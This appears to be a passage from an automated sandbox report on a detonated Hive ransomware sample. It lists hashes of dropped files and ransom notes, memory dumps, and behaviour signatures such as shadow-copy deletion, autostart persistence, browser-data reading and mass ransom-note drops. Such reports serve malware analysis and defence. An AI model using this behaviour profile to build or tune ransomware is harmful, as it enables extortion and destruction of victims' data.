C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\timeout.exe
timeout 1
Network
Files
memory/3020-0-0x0000000000B10000-0x0000000000DE9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\hive.bat
| MD5 | 6358d970c3edccb57eae7dbf9f42d58f |
| SHA1 | 25b994c3b5604f4f67e1ac6250bc2f14ce690380 |
| SHA256 | 9e36401051e677f69a82ab8fbdebd6b16210ee40612c8c7fa45ceb5d7757fe50 |
| SHA512 | 44819fec7e90b903eece750d0a2de531520ed9e637e17e4a57786f9a61c6d4b95ff6072fc3530a9d35d8dc756bcfe20f80a6a07a72d35cf24b305053ae389131 |
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\shadow.bat
| MD5 | df5552357692e0cba5e69f8fbf06abb6 |
| SHA1 | 4714f1e6bb75a80a8faf69434726d176b70d7bd8 |
| SHA256 | d158f9d53e7c37eadd3b5cc1b82d095f61484e47eda2c36d9d35f31c0b4d3ff8 |
| SHA512 | a837555a1175ab515e2b43da9e493ff0ccd4366ee59defe6770327818ca9afa6f3e39ecdf5262b69253aa9e2692283ee8cebc97d58edd42e676977c7f73d143d |
C:\$Recycle.Bin\S-1-5-21-3450744190-3404161390-554719085-1000\desktop.ini
| MD5 | a526b9e7c716b3489d8cc062fbce4005 |
| SHA1 | 2df502a944ff721241be20a9e449d2acd07e0312 |
| SHA256 | e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066 |
| SHA512 | d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88 |
memory/3020-73-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-85-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-558-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-1721-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-2906-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-3560-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-4326-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-4335-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-4336-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-4337-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-4338-0x0000000000B10000-0x0000000000DE9000-memory.dmp
C:\$Recycle.Bin\HOW_TO_DECRYPT.txt
| MD5 | ee4ad142674725d6d9b58c9c3bb836dc |
| SHA1 | ac9bac37131c72a549d2bf3fbd233061906d5fab |
| SHA256 | fc1f1ed6a6692d18788de47420ead7e8a1b534b015db69a39052a0a2fc30c776 |
| SHA512 | a34c547d13880b578703f52b7d3d61b1893536966204d80a9e0f60aee8851bd9f70e3d0ceb1601aa11901c6315f57128c49f2000cc4fcbc67ed92e4628e45da3 |
memory/3020-5668-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-8139-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-10988-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11884-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11885-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11887-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11890-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11891-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11894-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11895-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11897-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11899-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11901-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11903-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11905-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11907-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11909-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11912-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11914-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11916-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11918-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11920-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11923-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11925-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11927-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11929-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11931-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11933-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11935-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11937-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11939-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11942-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11944-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11946-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11948-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11951-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11953-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11975-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11978-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11980-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-11982-0x0000000000B10000-0x0000000000DE9000-memory.dmp
memory/3020-12008-0x0000000000B10000-0x0000000000DE9000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 16:12
Platform
win10v2004-20240508-en
Max time kernel
1779s
Max time network
1792s
Command Line
Signatures
Detects Go variant of Hive Ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Hive
Deletes shadow copies
Boot or Logon Autostart Execution: Active Setup
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Active Setup\Installed Components | N/A | N/A |
Drops file in Drivers directory
Boot or Logon Autostart Execution: Print Processors
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\spool\prtprocs\x64\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.P7EsMTWem2f4DapaPblE9Nbz88yP_gFc7vvnpVOSdzs.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\3D Objects\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\AccountPictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Libraries\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Camera Roll\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Searches\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-2539840389-1261165778-1087677076-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\OneDrive\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Saved Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Public\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\Speech\SpeechUX\es-ES\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\SecureBoot\de-DE\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\vhdmp.inf_amd64_aa94d04ecf56de1f\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_UserResource\es-ES\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_WaitForAll\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\InstallShield\setupdir\0804\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\uk-UA\Licenses\Volume\Professional\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mdmusrg.inf_amd64_bb7c44c7bb3664d0\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\es-ES\Licenses\Volume\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\wbem\Repository\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\Printing_Admin_Scripts\ja-JP\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\fr-FR\Licenses\_Default\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\ja-JP\Licenses\_Default\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\iai2c.inf_amd64_a77c815b2999404d\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mdmcrtix.inf_amd64_e3ded2b26d662526\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\IME\IMEKR\APPLETS\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\Tasks\Microsoft\Windows\PLA\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\fr-FR\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\spool\drivers\W32X86\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\it-IT\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\c_unknown.inf_amd64_9f92c189b415c003\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\hal.inf_amd64_fd0ae947345ac7bf\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\rdpbus.inf_amd64_05ebd3b4422f62ba\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\Speech\Common\fr-FR\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\Tasks\Microsoft\OneCore\DirectX\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\en-US\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\migwiz\replacementmanifests\WindowsSearchEngine\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AssignedAccess\de-DE\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\sppui\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\Speech\Common\en-US\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
